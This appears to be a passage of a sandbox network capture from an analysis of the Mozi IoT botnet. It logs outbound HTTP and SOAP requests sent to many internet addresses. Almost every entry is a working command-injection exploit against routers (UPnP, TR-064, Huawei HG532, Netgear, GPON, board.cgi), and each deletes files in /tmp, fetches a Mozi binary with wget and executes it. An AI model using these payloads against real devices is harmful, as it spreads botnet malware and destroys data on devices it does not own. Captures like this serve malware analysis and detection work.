                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              132192.168.2.235413242.208.199.21181
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265839100 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              133192.168.2.2356900118.137.245.6681
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265856028 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              134192.168.2.2358324201.200.12.1167574
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265882969 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:7574
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              135192.168.2.2344034164.98.152.8737215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265918016 CET821OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 164.98.152.87:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              136192.168.2.235772865.131.166.13049152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265944958 CET932OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 65.131.166.130:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              137192.168.2.235012632.170.33.25349152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265979052 CET931OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 32.170.33.253:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              138192.168.2.2343774124.13.202.218443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.265994072 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              139192.168.2.235225845.27.188.997574
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266019106 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:7574
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              140192.168.2.2344056191.251.39.308080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266033888 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              141192.168.2.235234277.93.207.388080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266056061 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              142192.168.2.2352166157.149.9.225555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266071081 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              143192.168.2.234613476.51.22.345555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266105890 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              144192.168.2.2334002103.159.1.8381
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266114950 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              145192.168.2.2357208119.7.140.1928080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266125917 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              146192.168.2.2333290214.156.186.645555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266159058 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              147192.168.2.2337392207.198.77.4580
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266184092 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
